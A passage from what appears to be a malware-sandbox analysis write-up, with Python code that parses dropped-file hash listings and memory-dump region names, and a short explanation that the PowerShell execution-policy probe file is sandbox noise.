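HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_listing(text):
    """Return (files, regions) from the flat listing.

    files:   list of {"path": ..., "md5": ..., "sha1": ..., ...} in order.
    regions: list of {"pid", "seq", "start", "end"} with integer fields.
    A hash row attaches to the most recent path; any other non-empty line
    that is not a memory-dump name opens a new file record.
    """
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if current is not None:
                current[m.group(1).lower()] = m.group(2).lower()
            continue
        m = MEM_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            regions.append({"pid": int(pid), "seq": int(seq),
                            "start": int(start, 16), "end": int(end, 16)})
            continue
        current = {"path": line}
        files.append(current)
    return files, regions


def group_by_sha256(files):
    """Map SHA256 -> sorted list of distinct paths dropped with that hash."""
    groups = defaultdict(set)
    for f in files:
        if "sha256" in f:
            groups[f["sha256"]].add(f["path"])
    return {h: sorted(paths) for h, paths in groups.items()}


def dumped_bytes_per_pid(regions):
    """Sum the sizes of the distinct (start, end) ranges dumped for each PID."""
    ranges = defaultdict(set)
    for r in regions:
        ranges[r["pid"]].add((r["start"], r["end"]))
    return {pid: sum(end - start for start, end in rs) for pid, rs in ranges.items()}


def hashes_match(record, data):
    """True if every hash recorded for the file equals the hash of data."""
    algos = {"md5": hashlib.md5, "sha1": hashlib.sha1,
             "sha256": hashlib.sha256, "sha512": hashlib.sha512}
    checked = [(name, fn) for name, fn in algos.items() if name in record]
    return bool(checked) and all(fn(data).hexdigest() == record[name]
                                 for name, fn in checked)


if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE)
    for sha, paths in group_by_sha256(files).items():
        if len(paths) > 1:
            print(sha[:16], "dropped as:", ", ".join(paths))
    print({pid: hex(n) for pid, n in dumped_bytes_per_pid(regions).items()})
    ps1 = next(f for f in files if f["path"].endswith(".ps1"))
    print("policy-test script body is the single character 1:", hashes_match(ps1, b"1"))
```

The hash check earns its place here: the MD5, SHA1 and SHA256 recorded for `__PSScriptPolicyTest_05s2xbzh.aj5.ps1` are those of the one-character string `1`, which is the throwaway probe PowerShell writes to test script execution policy, so that entry is sandbox noise rather than attacker content, while the repeated `0x400000-0x537000` range for PID 4908 is one 0x137000-byte image dumped many times, not many distinct regions.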